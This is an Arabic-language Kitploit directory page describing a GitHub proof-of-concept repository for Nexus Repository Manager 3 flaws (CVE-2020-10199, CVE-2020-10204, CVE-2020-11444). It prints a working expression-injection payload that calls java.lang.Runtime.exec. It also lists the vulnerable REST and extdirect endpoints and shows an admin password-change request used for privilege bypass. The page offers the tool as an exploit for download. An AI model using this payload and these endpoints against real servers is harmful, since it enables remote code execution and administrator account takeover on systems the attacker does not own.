Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-10199 — CVE-2020-10199、CVE-2020-10204、CVE-2020-11444 | Kitploit
أدوات/GitHubGitHub/jas502n/cve-2020-10199
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubjas502n/cve-2020-10199

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444

عرض المستودع
359منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Nexus Repository Manager 3 الثغرات (الإصدارات المتأثرة: <= 3.21.2)

CVE-2020-10199، CVE-2020-10204، CVE-2020-11444

CVE-2020-10199 تنفيذ أوامر الشيفرة عن بُعد

POC مع إظهار المخرجات

POC بدون إظهار المخرجات

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

صلاحيات المستخدم العادي

root@kitploit:~
/service/rest/beta/repositories/go/group

يتطلب صلاحيات المسؤول

  1. إنشاء CleanupPolicy

/service/extdirect

  1. إنشاء repositories

/service/rest/beta/repositories/apt/hosted

CVE-2020-10204 تنفيذ أوامر الشيفرة عن بُعد

  1. استخدام واجهة تحديث المستخدم

/service/extdirect

  1. استخدام واجهة إنشاء الدور

/service/extdirect

CVE-2020-11444 ثغرة تجاوز الصلاحيات

استدعاء واجهة تحديث الدور

root@kitploit:~
/service/rest/beta/security/users/admin/change-password

POST:
123456

الروابط المرجعية

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus

تنزيل الأداة